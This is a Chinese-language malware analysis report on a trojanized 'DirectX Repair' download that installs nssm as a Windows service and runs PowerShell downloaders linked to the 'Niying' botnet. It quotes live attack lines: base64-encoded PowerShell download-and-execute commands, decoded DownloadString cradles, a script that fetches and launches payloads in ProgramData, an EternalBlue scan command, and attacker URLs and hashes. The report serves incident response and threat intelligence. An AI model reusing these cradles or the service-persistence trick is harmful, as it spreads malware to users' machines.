一、?背景

近日，在幫助用戶解決病毒問(wèn)題時(shí)，發(fā)現(xiàn)用戶中的是下載者木馬。
其中一條日志內(nèi)容為：

防護(hù)項(xiàng)目：利用PowerShell執(zhí)行可疑腳本
執(zhí)行文件：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
執(zhí)行命令行："powershell.exe" -NoP -NonI -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB5AGUALgB5AGUAYQByAGkAZABwAGUAcgAuAGMAbwBtACcAKQApAA==
操作結(jié)果：已允許

進(jìn)程ID：6504
操作進(jìn)程：C:\Windows\nssm.exe
操作進(jìn)程命令行：C:\Windows\nssm.exe
操作進(jìn)程校驗(yàn)和：32559A80C27A69C15A1AAAD2B6AE7B893ECF69B1
父進(jìn)程ID：1080
父進(jìn)程：C:\Windows\System32\services.exe
父進(jìn)程命令行：C:\Windows\system32\services.exe

操作系統(tǒng)目錄竟然出現(xiàn)了nssm工具

將操作進(jìn)程命令行進(jìn)行base64解密即可得到：IEX ((new-object net.webclient).downloadstring('hxxp://ye.yearidper.com'))

通過(guò)查詢威脅情報(bào)，尋找到一個(gè)類似的樣本hxxp://win.yearidper.com/per.txt

繼續(xù)研究安全日志，發(fā)現(xiàn)一條日志內(nèi)容為：

防護(hù)項(xiàng)目：利用PowerShell執(zhí)行可疑腳本
執(zhí)行文件：C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
執(zhí)行命令行：powershell??"IEX (New-Object Net.WebClient).DownloadString('hxxp://cdn.comenbove.com/Ladon66.jpg'); Ladon 10.111.114.1/16 MS17010"
操作結(jié)果：已阻止

進(jìn)程ID：18248
操作進(jìn)程：C:\Windows\SysWOW64\cmd.exe
操作進(jìn)程命令行：cmd.exe /c powershell "IEX (New-Object Net.WebClient).DownloadString('hxxp://cdn.comenbove.com/Ladon66.jpg'); Ladon 10.111.114.1/16 MS17010"
操作進(jìn)程校驗(yàn)和：4048488DE6BA4BFEF9EDF103755519F1F762668F
父進(jìn)程ID：13520
父進(jìn)程：C:\Windows\SysWOW64\mmc.exe
父進(jìn)程命令行：mmc.exe

將該URL下載后，發(fā)現(xiàn)其為PowerShell下載者木馬。

再次查閱安全日志：

病毒名稱：Trojan/Agent
病毒ID：A68B6378A5A9FBBE
病毒路徑：C:\Users\Public\sharpwmi.exe
操作類型：修改?
操作結(jié)果：已處理

進(jìn)程ID：13520
操作進(jìn)程：C:\Windows\SysWOW64\mmc.exe
操作進(jìn)程命令行：mmc.exe
父進(jìn)程：C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

發(fā)現(xiàn)病毒將部分文件保存至C:\Users\Public下，打開C:\Users\Public，發(fā)現(xiàn)多個(gè)永恒之藍(lán)漏洞攻擊程序和爆破攻擊程序（pass.txt為密碼字典，user.txt為用戶名字典）：

繼續(xù)翻閱安全日志：

風(fēng)險(xiǎn)路徑：C:\Windows\system32\WMIHACKER_0.6.vbs, 病毒名：Backdoor/VBS.WMIHacker.a, 病毒ID：a81b2725827b6a11, 處理結(jié)果：已處理，刪除文件
風(fēng)險(xiǎn)路徑：C:\Windows\SysWOW64\WMIHACKER_0.6.vbs, 病毒名：Backdoor/VBS.WMIHacker.a, 病毒ID：a81b2725827b6a11, 處理結(jié)果：已處理，刪除文件

可發(fā)現(xiàn)病毒往系統(tǒng)目錄塞了兩個(gè)可疑vbs，文件名為WMIHACKER_0.6.vbs經(jīng)過(guò)查詢，WMIHACKER為內(nèi)網(wǎng)橫向滲透攻擊工具。

詢問(wèn)用戶后，用戶稱下載并運(yùn)行了一個(gè)“dx修復(fù)工具”（DirectXRepair_4.1.0.30770_Online.rar）后出現(xiàn)相關(guān)癥狀。

二、追溯
（一）
通過(guò)hxxp://ye.yearidper.com，可查詢到之前多人在多個(gè)論壇中此毒，如下圖所示：

（二）
1.?
通過(guò)對(duì)hxxp://cdn.comenbove.com的威脅情報(bào)查詢，發(fā)現(xiàn)了一個(gè)通信樣本（9438183a93abc1f1dbb980b9de99bb8838267f6ca14cb33b1e29b42ebb8dfa97）：

該樣本偽裝為Steam相關(guān)文件

PE文件信息：

文件說(shuō)明：Steam
文件版本：2.10.91.91
產(chǎn)品名稱：Steam
語(yǔ)言：0x0816 0x04e4
版權(quán)：? Valve Corporation

運(yùn)行后，該樣本會(huì)直接訪問(wèn)并下載hxxp://cdn.comenbove.com/shell.txt，內(nèi)容為Powershell下載者木馬：

(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/Run.txt','C:\ProgramData\Run.txt')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/cp.txt','C:\ProgramData\cp.exe')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/msvcr120.txt','C:\ProgramData\msvcr120.dll')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/abc.jpg','C:\ProgramData\abc.jpg')
Start-Process -FilePath C:\ProgramData\cp.exe C:\ProgramData\Run.txt

該樣本同時(shí)會(huì)執(zhí)行命令行：

powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA1AGQALgBiAGIAYQBjAHAAdQBtAG0AZAAuAGMAbABvAHUAZAAnACkAKQA=

base64解密后為：
IEX ((new-object net.webclient).downloadstring('hxxp://5d.bbacpummd.cloud'))

訪問(wèn)并下載hxxp://5d.bbacpummd.cloud，內(nèi)容為：

(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/Run.txt','C:\ProgramData\Run.txt')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/cp.txt','C:\ProgramData\cp.exe')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/msvcr120.txt','C:\ProgramData\msvcr120.dll')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/abc.jpg','C:\ProgramData\abc.jpg')
Start-Process -FilePath C:\ProgramData\cp.exe C:\ProgramData\Run.txt

同時(shí)，我們發(fā)現(xiàn)，樣本還會(huì)訪問(wèn)并下載http://5d.strongapt.ml當(dāng)中的文件，但網(wǎng)站已掛，經(jīng)過(guò)查詢發(fā)現(xiàn)該域名曾被用于“匿影”僵尸網(wǎng)絡(luò)投放此前的“WannaRen”勒索病毒（360發(fā)現(xiàn)，此前地址為hxxps://api.strongapt.ml/vmp2.jpg），奇安信也早已將多個(gè)通信域名標(biāo)記為“HideShadowMiner”家族處理。

實(shí)錘為疑似“匿影”僵尸網(wǎng)絡(luò)相關(guān)病毒樣本。

2.
通過(guò)對(duì)hxxp://cdn.comenbove.com的威脅情報(bào)查詢，又發(fā)現(xiàn)該服務(wù)器還有一個(gè)hxxp://cdn.comenbove.com/smb.jpg，如下圖所示：

內(nèi)容為：

$fileNames = Test-Path C:\ProgramData\smbx22.txt
$nic='True'
if($fileNames -ne $nic){
(new-object System.Net.WebClient).DownloadFile( 'https://www.upload.ee/files/14046702/1.txt.html','C:\ProgramData\smbx22.txt')

? ? }

(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/Run.txt','C:\ProgramData\Run.txt')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/cp.txt','C:\ProgramData\cp.exe')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/msvcr120.txt','C:\ProgramData\msvcr120.dll')
(new-object System.Net.WebClient).DownloadFile( 'hxxp://cdn.comenbove.com/smbdown/abc.jpg','C:\ProgramData\abc.jpg')
Start-Process -FilePath C:\ProgramData\cp.exe C:\ProgramData\Run.txt

（https://www.upload.ee/files/14046702/1.txt.html為0kb空白空文件）

三、對(duì)帶毒DirectXRepair進(jìn)行探究

文件名：DirectX Repair.exe

PE文件信息：

File Version Information:
Original Name：加入任務(wù)計(jì)劃.exe
Internal Name：加入任務(wù)計(jì)劃
File Version：1.0

文件運(yùn)行后，會(huì)一邊釋放“dx修復(fù)工具”所需文件，一邊釋放nssm.exe至系統(tǒng)目錄下：

Files Dropped：

%ProgramData%\DirectX Repair.exe
%windir%\nssm.exe

隨后，便會(huì)命令行執(zhí)行：

%windir%\nssm.exe install nssmsevr powershell.exe -NoP -NonI -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB5AGUALgB5AGUAYQByAGkAZABwAGUAcgAuAGMAbwBtACcAKQApAA

（與“一、背景”一章當(dāng)中為同一個(gè)Powershell命令，base64解密結(jié)果與第一章一致）

經(jīng)過(guò)分析，樣本會(huì)在%ProgramData%內(nèi)釋放正常使用“dx修復(fù)”功能所需的組件，而背后又在一邊偷偷釋放和執(zhí)行%windir%\nssm.exe與cmd或Powershell下載者木馬命令行，相關(guān)思維導(dǎo)圖如下圖所示：

四、價(jià)值意義

“匿影”僵尸網(wǎng)絡(luò)曾投放“WannaRen”等勒索病毒，甚至有一部分用戶中此病毒時(shí)同時(shí)中了勒索病毒（暫時(shí)無(wú)法確定其是否有關(guān)聯(lián)），雖然暫未發(fā)現(xiàn)其他行為，但是對(duì)用戶危害較大，其危害性不容小覷，用戶發(fā)現(xiàn)告警后需及時(shí)處理。

五、Iocs

文件名病毒類型MD5EternalBlue.ps1漏洞攻擊程序17631532e3afc09eb8ccbe172adbd422MS17010EXP.ps1漏洞攻擊程序3d485260a28a458ec499a6951640f651NoPSExec.exe黑客工具9a029b987b9a8df9613559dbe67969b5sharpwmi.exe黑客工具8fdf897330a9c01776a4242d26089622smbexec40.exe黑客工具23d02116f7489304bac069051636bcc8WMIHACKER_0.6.vbs黑客工具ceb337687402e19efdf57264b2682d08shellPowershell下載者f409c880cd868f743e30ac4b7db611feabc.jpgPowershell下載者c40d980cf5a821696adabb8d215440fbLadon66.jpgPowershell下載者c8c04f28271812c48497f55e7d3d951fcpPowershell下載者da8439e2ad085f320429f1caf3d1d1e5smb.jpgPowershell下載者bbf56807db3e256d38aee5b3386f601aLadon.exe木馬病毒2a871079cd6f8d845de0554a6ba29ddfAsy.jpg木馬病毒8a846340033c363af8efdbe4f865d2adSteam.exe木馬病毒c1e7fc36f3a71f6dcb210b4f3127918dDirectX Repair.exe木馬病毒e5ec937968841a68872ac135039b3914
hxxp://ye.yearidper.com
hxxp://cdn.comenbove.com/Ladon66.jpg
hxxp://cdn.comenbove.com/shell.txt
hxxp://cdn.comenbove.com/smbdown/cp.txt
hxxp://cdn.comenbove.com/smbdown/abc.jpg
hxxp://cdn.comenbove.com/Asy.jpg
hxxp://cdn.comenbove.com/smb.jpg
hxxp://5d.bbacpummd.cloud/

*本文當(dāng)中惡意鏈接均已做無(wú)害化處理（hxxp），base64代碼可能會(huì)被防病毒軟件檢測(cè)到屬正?，F(xiàn)象網(wǎng)頁(yè)不可被直接執(zhí)行為了保證文章盡量完整暫時(shí)不做處理。